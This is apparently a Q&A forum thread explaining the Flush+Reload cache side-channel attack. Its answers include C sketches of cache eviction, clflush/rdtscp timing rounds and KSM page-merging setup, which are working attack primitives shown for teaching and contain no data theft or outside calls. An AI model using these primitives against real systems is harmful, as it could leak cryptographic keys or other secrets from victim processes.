Flush & Reload cache side channel attack


I'm trying to understand the Flush + Reload cache side-channel attack. As far as I know, the attack exploits the fact that data the attacker is not privileged to read can still be loaded into the cache (e.g., when exploiting branch prediction, speculative execution, etc.). The attacker then uses a probe array and measures access times: memory that loads fast is assumed to be in the cache, and therefore to reveal part of the secret data.

One thing I find unclear is how the attacker is able to iterate through virtual memory they are not privileged to access - for example, kernel virtual memory or other processes' memory.


There are 2 answers

b degnan

Firstly, you should take a look at my description of why lookup tables don't run in constant time, as I have pictures there of how the cache and tagging work.

The cache sits between the MMU and the CPU, and the MMU is what creates virtual memory; cache attacks are therefore largely independent of virtual memory. They work by forcing a cache flush and then picking and choosing how the cache will be reloaded, because you are looking for temporal information. The external fetches between cache levels (and out to memory) are what leak information. (A note: this is basically an x86 problem, as x86 does not allow cache locking, unlike most CPUs since 1990. Another caveat is that I have only made hardware for non-x86 architectures, so someone please let me know if I am wrong about cache locking for critical data.)

For the sake of a general example, suppose we have a 1 KiB cache and we use the AES S-box as a lookup table, so 256 entries.

  • Force a flush of the cache from a different process by reading 2 KiB of bytes from memory.
  • The AES process starts running and pulls the S-box data into the cache via bus fetches.
  • We then read 1023 bytes of different data from our process to evict all but one of the AES entries, and watch which later accesses come back slow due to a bus read.
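The first and third steps above are the same primitive: stream through a buffer, one touch per cache line, so the cache refills with the attacker's data. A minimal C sketch, assuming the toy geometry from the example (1 KiB cache, 64-byte lines - both numbers are illustrative, not from any real part):

```c
#include <stddef.h>
#include <stdint.h>

/* Toy geometry for the example above (assumed, for illustration only). */
#define CACHE_BYTES 1024u
#define LINE_BYTES    64u

/* "Flush" the cache by streaming through a buffer, touching one byte
 * per cache line so every set is refilled with our own data.
 * Returns a checksum so the compiler cannot optimize the reads away. */
static uint64_t evict_by_streaming(const volatile uint8_t *buf, size_t len)
{
    uint64_t sum = 0;
    for (size_t i = 0; i < len; i += LINE_BYTES)
        sum += buf[i];
    return sum;
}
```

The attacker would call this over a `2 * CACHE_BYTES` buffer before the victim's AES run, and over the smaller 1023-byte buffer afterwards; the timing of the subsequent S-box accesses then carries the leak.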

Now for the MMU version, where we attack virtual memory. If you looked at the answer I linked, you will see there are cache tags. Assume a simple example where I have two processes, each with 20 bits of address space (1 MiB). The MMU gives both processes the same virtual layout of the form 0xYYY00000, where YYY is the actual prefix in physical memory. If I know how the MMU is mapping the data, I can create a structured attack based on the tag information created in the cache by how the memory overlaps.

There are more details on how you structure these attacks on the software side in Bernstein's Cache-timing attacks on AES.

andy
  1. There are different cache side channel attacks - many variants - but it seems you are confusing two of them: Prime + Probe and Flush + Reload. Since this is a question about Flush + Reload, I'll stick to that.

  2. Flush + Reload works by abusing shared code/data combined with how the clflush instruction (cache-line flush) works, at least on x86; there are variants for other architectures. The victim and attacker must physically share at least one page of data. When the attacker executes clflush on an address pointing into this shared data, the line is flushed from the entire cache hierarchy. Because the data is shared, the attacker is allowed to hit on it in the cache. So the attacker repeatedly flushes the shared data, allows/waits for the victim to run, then reloads the data and times the access. If the attacker gets a cache miss, the victim didn't access the data (didn't bring it back into the cache); if it's a hit, the victim (at least probably) did. The attacker can tell cache hits from misses because the timing of the memory access is very different.
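The flush-wait-reload loop described above can be sketched in C with the x86 intrinsics. This is a minimal sketch, not a complete attack: the hit/miss threshold is an assumed parameter that must be calibrated per machine, and the victim's execution window is left as a comment.

```c
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

/* Time a single access to *p in TSC cycles, serialized with rdtscp. */
static inline uint64_t time_access(const volatile uint8_t *p)
{
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;                        /* the probed load */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

/* One Flush+Reload round: flush the shared line, give the victim a
 * window to run, then reload and compare against a calibrated
 * threshold. Returns 1 if the reload looks like a cache hit,
 * i.e. the victim touched the line in the meantime. */
static int flush_reload_round(const volatile uint8_t *shared,
                              uint64_t hit_threshold)
{
    _mm_clflush((const void *)shared);  /* evict from whole hierarchy */
    _mm_mfence();
    /* ... wait here for the victim to (maybe) access *shared ... */
    return time_access(shared) < hit_threshold;
}
```

In practice the threshold is found by timing a known-cached and a known-flushed access a few thousand times each and picking a value between the two distributions.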

  3. How can the attacker and victim share data if they are different processes? You need to know a little about modern OSes. Typically, shared libraries are loaded only once physically in memory. For example, the standard C library is loaded once, but separate applications access the same data (physically) because the OS sets up their page tables to point to the same physical address.
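The same sharing can be seen within one process by mapping a file twice: on Linux, both mappings are backed by the same page-cache pages, which is exactly the cross-process sharing (e.g., of libc) that Flush + Reload relies on. A sketch - note that actually proving the physical identity of the pages would require reading `/proc/self/pagemap` (privileged); this only demonstrates the double mapping an attacker would set up:

```c
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Map the same file read-only at two different virtual addresses.
 * The kernel backs both views with the same physical page-cache
 * pages. Returns 1 if both views exist and agree, -1 on error. */
static int map_file_twice(const char *path, size_t len)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    const char *a = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0);
    const char *b = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);
    if (a == MAP_FAILED || b == MAP_FAILED)
        return -1;
    /* Different virtual addresses, same underlying physical pages. */
    int same = (a != b) && memcmp(a, b, len) == 0;
    munmap((void *)a, len);
    munmap((void *)b, len);
    return same;
}
```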

  4. Some OSes are more aggressive and scan physical memory to find pages which have exactly the same data. In that case, they "merge" the pages by changing the page tables so that all processes using this data point to a single physical page, instead of keeping two physical copies. Unfortunately, this allows Flush + Reload to happen even among non-shared libraries: if you know the code of the victim and you want to monitor it, you can just load it into your address space (mmap it) and the OS will happily deduplicate the memory, giving you access to their pages. As long as you both only read the data, it's fine; if either of you writes, the OS is forced to unmerge the pages. However, this is fine for Flush + Reload: you are only interested in reading anyway!
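On Linux this deduplication is KSM (kernel same-page merging), and it is opt-in via madvise. A sketch of the attacker's side, assuming the attacker already has a byte-identical copy of the victim data (`victim_image` is a stand-in name, an assumption of this sketch):

```c
#define _GNU_SOURCE
#include <string.h>
#include <sys/mman.h>

/* Allocate an anonymous region, fill it with the known victim
 * contents, and mark it MADV_MERGEABLE. If KSM is enabled, the
 * kernel will eventually collapse this copy and the victim's page
 * into one shared, copy-on-write physical page - a Flush+Reload
 * target. Returns the mapping, or NULL on failure. */
static void *make_mergeable_copy(const void *victim_image, size_t len)
{
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return NULL;
    memcpy(p, victim_image, len);
    /* Merging is advisory and asynchronous; this fails harmlessly
     * (EINVAL) on kernels built without CONFIG_KSM. */
    madvise(p, len, MADV_MERGEABLE);
    return p;
}
```

Note that any write to the merged page triggers the copy-on-write unmerge described above, which is why the probe in Flush + Reload only ever reads.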